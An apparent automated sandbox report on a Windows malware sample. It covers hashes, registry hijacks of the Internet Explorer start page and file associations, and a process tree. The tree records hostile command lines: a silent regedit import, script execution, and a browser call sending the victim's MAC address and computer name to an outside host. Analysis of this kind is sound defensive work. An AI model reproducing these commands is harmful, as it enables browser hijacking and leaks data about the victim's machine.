Analysis
-
max time kernel
93s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
12-10-2024 22:38
Behavioral task
behavioral1
Sample
3c6448aad3c6230f3a4e2061e1d202f4_JaffaCakes118.exe
Resource
win7-20240903-en
General
-
Target
3c6448aad3c6230f3a4e2061e1d202f4_JaffaCakes118.exe
-
Size
29KB
-
MD5
3c6448aad3c6230f3a4e2061e1d202f4
-
SHA1
75827c80ee238c047e2fd55d48608909e671c889
-
SHA256
d708babe2598e2473d12ca347e2942913cc74caed08e8710054a69b9e520ccab
-
SHA512
99813b533dd30a3bd0977a79f55fc702aeff1730e836f9d1d196a359fee9c56f82530b801d78784646095f2d6ee2b208166656d7d0341a8f69b9958eabb7ce55
-
SSDEEP
768:jP7p+u1NdEFUtLKbULT5NuYzDdFCMF2b:r9+MNG2FKb+JzDdFCMQb
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation 3c6448aad3c6230f3a4e2061e1d202f4_JaffaCakes118.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation WScript.exe -
resource yara_rule behavioral2/memory/3200-0-0x0000000000400000-0x0000000000429000-memory.dmp upx behavioral2/memory/3200-36-0x0000000000400000-0x0000000000429000-memory.dmp upx -
Drops file in Program Files directory 4 IoCs
description ioc Process File created C:\Program Files\Common Files\READ.TXT WScript.exe File created C:\Program Files\Common Files\tk.reg 3c6448aad3c6230f3a4e2061e1d202f4_JaffaCakes118.exe File opened for modification C:\Program Files\Common Files\oegqpvlpi.mzkai 3c6448aad3c6230f3a4e2061e1d202f4_JaffaCakes118.exe File created C:\Program Files\Common Files\oegqpvlpi.mzkai 3c6448aad3c6230f3a4e2061e1d202f4_JaffaCakes118.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\My.ini 3c6448aad3c6230f3a4e2061e1d202f4_JaffaCakes118.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wscript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3c6448aad3c6230f3a4e2061e1d202f4_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regedit.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31137015" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Search Page = "c:\\about blank.htm" WScript.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{C5B50088-88EA-11EF-B9B6-468C69F2ED48} = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000bb73de6dedeff944803e966ed33631240000000002000000000010660000000100002000000011898a6ac52471360960d347c697ec81398def3231a70f635a28e7d24a9d7e0a000000000e80000000020000200000008fe5296135dc615462c148cfbc431f4abafa9c3e9e65b78666534ecc15c5ae6320000000e29af49737de10d9aa26e9d027b0e4f30d858cfb1bd809daa957e8e57434aba040000000f8dba246c4a3dd8f34a10c4897239220283472fd3346445f4a2f4e17bc3086c697ae1f07fd5dd665d024eccde608e765b27d4bebe2334e71eb77b41ac6410ca2 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 30764591f71cdb01 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Internet Explorer\Main WScript.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page Redirect Cache = "c:\\about blank.htm" WScript.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Local Page = "c:\\about blank.htm" WScript.exe Set value (int) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31137015" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\"" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2585380688" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Internet Explorer\VersionManager IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2616787216" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Internet Explorer\GPU IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2587880744" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Internet Explorer\VersionManager iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Internet Explorer\VersionManager IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3e0000003e000000c4040000a3020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "2585380688" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31137015" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "435537714" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Internet Explorer\IESettingSync IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31137015" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe -
Modifies Internet Explorer start page 1 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page = "c:\\about blank.htm" WScript.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shell\ = "open" regedit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\DefaultIcon regedit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\CLSID\ = "{FBF23B40-E3F0-101B-8488-00AA003E56F8}" WScript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\shell\open\command WScript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{BB4491A2-D11A-4c6b-91C0-B53246A3122B}\Shell\Open(&O) WScript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shell regedit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\ScriptEngine regedit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\ScriptHostEncode regedit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\shellex WScript.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\WOW6432Node\CLSID\{BB4491A2-D11A-4c6b-91C0-B53246A3122B}\Shell WScript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\tkfile regedit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\DefaultIcon\ = "C:\\Windows\\SysWow64\\WScript.exe,3" regedit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\Shell\Open2 regedit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Ink WScript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\DefaultIcon WScript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shellex\ContextMenuHandlers\ regedit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\ScriptEngine\ = "JScript" regedit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shell\open\command\ = "C:\\Windows\\SysWow64\\WScript.exe \"%1\" %*" regedit.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\WOW6432Node\CLSID\{BB4491A2-D11A-4c6b-91C0-B53246A3122B}\Shell\Property(&R)\Command\ = "Rundll32.exe Shell32.dll,Control_RunDLL Inetcpl.cpl" WScript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mzkai regedit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shellex\DropHandler\ = "{e96f0e95-227e-4cc1-8f1e-2b0c01b1f080}" regedit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shellex\PropertySheetHandlers\WSHProps\ = "{e96f0e95-227e-4cc1-8f1e-2b0c01b1f080}" regedit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\shell\open WScript.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\WOW6432Node\CLSID\{BB4491A2-D11A-4c6b-91C0-B53246A3122B}\ = "Internet Explorer" WScript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mzkai\ = "tkfile" regedit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Ink\ = "Inkfile" WScript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\shellex\ContextMenuHandlers WScript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\shellex\ContextMenuHandlers\ WScript.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\WOW6432Node\CLSID\{BB4491A2-D11A-4c6b-91C0-B53246A3122B}\Shell\ WScript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\Shell\Print\Command regedit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\ShellEx\PropertySheetHandlers\WSHProps regedit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{BB4491A2-D11A-4c6b-91C0-B53246A3122B}\DefaultIcon WScript.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\WOW6432Node\CLSID\{BB4491A2-D11A-4c6b-91C0-B53246A3122B}\Shell\Property(&R) WScript.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\WOW6432Node\CLSID\{BB4491A2-D11A-4c6b-91C0-B53246A3122B}\Shell\Property(&R)\Command WScript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\Shell\Print regedit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\Shell\Edit\Command regedit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\shell\open\CLSID = "{FBF23B40-E3F0-101B-8488-00AA003E56F8}" WScript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\shellex WScript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\shellex\ContextMenuHandlers WScript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.qc WScript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\shell\open\CLSID = "{FBF23B40-E3F0-101B-8488-00AA003E56F8}" WScript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{BB4491A2-D11A-4c6b-91C0-B53246A3122B}\Shell\Property(&R)\Command WScript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shell\open regedit.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\WOW6432Node\CLSID\{BB4491A2-D11A-4c6b-91C0-B53246A3122B}\DefaultIcon\ = "C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE" WScript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\shellex\IconHandler\ = "{FBF23B40-E3F0-101B-8488-00AA003E56F8}" WScript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\DefaultIcon WScript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shellex\IconHandler regedit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{BB4491A2-D11A-4c6b-91C0-B53246A3122B}\Shell WScript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shell\open\command\ = "WScript.exe" regedit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\shell WScript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\shellex\ContextMenuHandlers\ WScript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{BB4491A2-D11A-4c6b-91C0-B53246A3122B}\ = "Internet Explorer" WScript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shell\Print\Command\ = "C:\\Windows\\SysWow64\\Notepad.exe /p %1" regedit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\shell\ = "open" WScript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\shell\open\command WScript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\shell\ = "open" WScript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\tkFile\ShellEx\PropertySheetHandlers regedit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shell\Open2\MUIVerb = "@C:\\Windows\\System32\\wshext.dll,-4511" regedit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shell\Open2\ = "Open &with Command Prompt" regedit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Inkfile\NeverShowExt WScript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\qcfile\shell\open WScript.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{BB4491A2-D11A-4c6b-91C0-B53246A3122B}\ShellFolder\Property = "10" WScript.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\WOW6432Node\CLSID\{BB4491A2-D11A-4c6b-91C0-B53246A3122B}\Shell\Property(&R)\ WScript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\tkfile\shellex\ContextMenuHandlers regedit.exe -
Runs .reg file with regedit 1 IoCs
pid Process 3576 regedit.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 1616 iexplore.exe 1616 iexplore.exe -
Suspicious use of SetWindowsHookEx 11 IoCs
pid Process 3200 3c6448aad3c6230f3a4e2061e1d202f4_JaffaCakes118.exe 1616 iexplore.exe 1616 iexplore.exe 1408 IEXPLORE.EXE 1408 IEXPLORE.EXE 1616 iexplore.exe 1616 iexplore.exe 5032 IEXPLORE.EXE 5032 IEXPLORE.EXE 5032 IEXPLORE.EXE 5032 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 22 IoCs
description pid Process procid_target PID 3200 wrote to memory of 4024 3200 3c6448aad3c6230f3a4e2061e1d202f4_JaffaCakes118.exe 84 PID 3200 wrote to memory of 4024 3200 3c6448aad3c6230f3a4e2061e1d202f4_JaffaCakes118.exe 84 PID 3200 wrote to memory of 4024 3200 3c6448aad3c6230f3a4e2061e1d202f4_JaffaCakes118.exe 84 PID 4024 wrote to memory of 3576 4024 cmd.exe 87 PID 4024 wrote to memory of 3576 4024 cmd.exe 87 PID 4024 wrote to memory of 3576 4024 cmd.exe 87 PID 3200 wrote to memory of 4656 3200 3c6448aad3c6230f3a4e2061e1d202f4_JaffaCakes118.exe 90 PID 3200 wrote to memory of 4656 3200 3c6448aad3c6230f3a4e2061e1d202f4_JaffaCakes118.exe 90 PID 3200 wrote to memory of 4656 3200 3c6448aad3c6230f3a4e2061e1d202f4_JaffaCakes118.exe 90 PID 4656 wrote to memory of 1616 4656 WScript.exe 92 PID 4656 wrote to memory of 1616 4656 WScript.exe 92 PID 1616 wrote to memory of 1408 1616 iexplore.exe 93 PID 1616 wrote to memory of 1408 1616 iexplore.exe 93 PID 1616 wrote to memory of 1408 1616 iexplore.exe 93 PID 3200 wrote to memory of 3720 3200 3c6448aad3c6230f3a4e2061e1d202f4_JaffaCakes118.exe 98 PID 3200 wrote to memory of 3720 3200 3c6448aad3c6230f3a4e2061e1d202f4_JaffaCakes118.exe 98 PID 3200 wrote to memory of 4544 3200 3c6448aad3c6230f3a4e2061e1d202f4_JaffaCakes118.exe 100 PID 3200 wrote to memory of 4544 3200 3c6448aad3c6230f3a4e2061e1d202f4_JaffaCakes118.exe 100 PID 3200 wrote to memory of 4544 3200 3c6448aad3c6230f3a4e2061e1d202f4_JaffaCakes118.exe 100 PID 1616 wrote to memory of 5032 1616 iexplore.exe 101 PID 1616 wrote to memory of 5032 1616 iexplore.exe 101 PID 1616 wrote to memory of 5032 1616 iexplore.exe 101
Processes
-
C:\Users\Admin\AppData\Local\Temp\3c6448aad3c6230f3a4e2061e1d202f4_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\3c6448aad3c6230f3a4e2061e1d202f4_JaffaCakes118.exe"1⤵
- Checks computer location settings
- Drops file in Program Files directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3200 -
C:\Windows\SysWOW64\cmd.execmd.exe /c regedit /s "C:\Program Files\Common Files\tk.reg"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4024 -
C:\Windows\SysWOW64\regedit.exeregedit /s "C:\Program Files\Common Files\tk.reg"3⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
- Runs .reg file with regedit
PID:3576
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\SysWow64\WScript.exe" "C:\Program Files\Common Files\oegqpvlpi.mzkai"2⤵
- Checks computer location settings
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Modifies Internet Explorer start page
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4656 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://www.54600.com/?byme3⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1616 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1616 CREDAT:17410 /prefetch:24⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1408
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1616 CREDAT:17414 /prefetch:24⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:5032
-
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://www1.4728.net/setuptj.asp?a_ip=&a_mac=46:8C:69:F2:ED:48&a_cpname=GUMLNLFE&a_user=byme&a_locip=0.0.0.02⤵
- Modifies Internet Explorer settings
PID:3720
-
-
\??\c:\windows\SysWOW64\wscript.exec:\windows\system32\wscript.exe C:\Users\Admin\AppData\Local\Temp\Killme.vbs2⤵
- System Location Discovery: System Language Discovery
PID:4544
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
43KB
MD58ec453fbdf17122bdcb919a605284243
SHA14e50e889ab97ce2847e02c6ad2a1a6d4c7787d7d
SHA2564816a417d1c857d01ca6a43ad5d7ab36add6c4ed4139f7aa8d01c760448b8cb2
SHA5122b73cacf2e617285f4debe3710eb4d05c53e4b31b0d6721b43ee52fdafb00e6fa5966af523c8c969ad3521774aaeceaf561effe2d6558011875386af9e4b459f
-
Filesize
2KB
MD503d8d233ce5d8e3e219395d5737ef475
SHA1c05baef5d980d40f8fcb6436713499f6ae453f8a
SHA2561214d861e6846631195567f6a6fc6cf6da63c98aede974dad7d7c10330265ec9
SHA512d39d5913dceb0a5a441ab1859a1cfe9093111e6f5d66358f407dab1f1890ace06f782a116409a182e7b823d48a96f3ee4f543213ecbb2b32ac21bb8839e9ea9b
-
Filesize
17KB
MD55a34cb996293fde2cb7a4ac89587393a
SHA13c96c993500690d1a77873cd62bc639b3a10653f
SHA256c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
SHA512e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee
-
Filesize
195B
MD55b12589e2bfeb38d6518f8a0c4c59c3d
SHA160e774034f9ee0f13ee916d1e0a00a2a759d0a70
SHA25622541d6db51f34dade19bff96e3d5c07e523d9a260f3121e5dd5765f76089d94
SHA512b1332aa6347424b071f5f273468059578f74e0af2e361633429c4209dd7263287a399e5ce4c37a9acbd8e54f1d9689c9f58ceca3c784b0a9fa1260d353ff9e12
-
Filesize
314B
MD520f05ff0c3be32e56eea148848360637
SHA1cd2c3d731b6f64f40fd6d77cc5f377433490b9c1
SHA256ba617de13e5a1d492d569ec9f33c2f9ce10aa1be9e3402823c143df3ce5c6dd1
SHA5122f270d247b3d26aadb591c2160b54f8c7f3657974caaee47029802d0379c93e7545afe584de38e7960896eacfc6b92b0f9e78a1f38eba66833b37b63a32a0e6c